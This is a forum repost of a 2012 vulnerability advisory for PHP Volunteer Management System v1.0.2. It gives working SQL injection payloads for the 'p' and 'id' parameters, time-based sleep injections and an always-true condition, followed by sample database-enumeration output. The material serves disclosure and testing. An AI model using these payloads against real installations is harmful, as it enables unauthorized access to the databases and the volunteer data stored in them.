Jump to content
The_Arhitect

PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.

Recommended Posts

Posted

PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.

# Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities
# Version: 1.0.2
# Author/Found by: loneferret
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Other vulnerabilities: http://www.exploit-db.com/exploits/18941/

# Date found: May 28th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23

# Vulnerability:
# Due to improper sanitation, many of the parameters are injectable,
# some need to be authenticated, others not.


# As always have fun...

PoC:

Page: index.php
Parameter: ?p=
Method: GET
Payload: /?p=dashboard' and sleep(5) and '1'='1
Payload: /?p=login' and sleep(5) and '1'='1

Other affected parameters can be found in the message section of
the application when reading or deleting a message.

Parameter: id=
Url: /?p=read_message&id=2
Payload: /?p=read_message&id=-1' or '1'='1


Possible output:
[10:00:02] [INFO] searching database 'bf102'
[10:00:02] [INFO] the SQL query used returns 1 entries
[10:00:02] [INFO] resumed: "bf102"
found databases [1]:
[*] bf102

Sursa: PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...